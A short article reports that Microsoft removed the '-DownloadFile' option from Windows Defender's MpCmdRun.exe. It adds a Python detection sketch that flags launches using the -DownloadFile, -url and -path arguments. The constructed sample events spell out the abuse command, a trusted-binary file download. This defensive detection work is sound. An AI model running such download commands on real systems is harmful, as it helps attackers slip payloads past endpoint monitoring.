Earlier this month, Microsoft met backlash for adding a new “-DownloadFile” command-line option to Windows Defender, which let anyone with some level of access to the system download files through a trusted application and potentially evade detection. The feature appeared without warning and has been removed almost as quickly: as of version 4.18.2009.2-0 it is quietly gone. Attempting to use the “-DownloadFile” option will once again return the message “CmdTool: Invalid command line argument.”
Defenders can still watch out for attempts to use this option by monitoring process execution events where “MpCmdRun.exe” is being launched with the “-DownloadFile”, “-path” or “-url” arguments. With the feature being removed quickly and quietly, chances are high that any instance of “MpCmdRun.exe” being launched with those three arguments will not be legitimate.
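The check described above, sketched as an added example that is not from the original article. It assumes process-creation events exposing `Image` and `CommandLine` fields (as Sysmon process-creation records do); the `Host` field, the sample events and the confidence labels are constructed for illustration.

```python
import ntpath
import re

# The three arguments named in the article, lower-cased for comparison.
WATCHED_ARGS = ("-downloadfile", "-url", "-path")
TOKEN_RE = re.compile(r'"[^"]*"|\S+')  # a quoted string or a run of non-spaces

# Constructed process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"Host": "ws-01", "Image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     "CommandLine": r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -DownloadFile '
                    r"-url https://example.test/f.bin -path C:\Users\Public\f.bin"},
    {"Host": "ws-02", "Image": r"C:\Temp\mpcmdrun.exe",
     "CommandLine": r"mpcmdrun.exe -downloadfile -URL https://example.test/f.bin"},
    {"Host": "ws-03", "Image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     "CommandLine": r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 1'},
    {"Host": "ws-04", "Image": r"C:\Windows\System32\findstr.exe",
     "CommandLine": r'findstr /i "-DownloadFile" C:\Logs\MpCmdRun.log'},
]


def tokenize(command_line):
    """Split a Windows command line into lower-cased tokens, dropping quotes."""
    return [t.strip('"').lower() for t in TOKEN_RE.findall(command_line)]


def check_event(event):
    """Return a finding for a suspicious MpCmdRun.exe launch, else None."""
    # Match on the launched image, not on the string appearing somewhere
    # in another process's command line (see the findstr sample).
    if ntpath.basename(event.get("Image", "")).lower() != "mpcmdrun.exe":
        return None
    tokens = tokenize(event.get("CommandLine", ""))
    # Whole-token comparison, so a URL that merely contains "-path" is ignored.
    matched = [arg for arg in WATCHED_ARGS if arg in tokens]
    if not matched:
        return None
    # Assumption: all three together is the article's pattern; a partial
    # match is surfaced for analyst review instead of being dropped.
    confidence = "high" if len(matched) == len(WATCHED_ARGS) else "review"
    return {"host": event.get("Host"), "matched": matched,
            "confidence": confidence, "command_line": event.get("CommandLine")}


def scan(events):
    """Run check_event over an iterable of events and keep the findings."""
    return [f for f in map(check_event, events) if f is not None]
```

Matching is case-insensitive and token-based as a defensive choice, so casing or quoting variations in the logged command line do not slip past the rule.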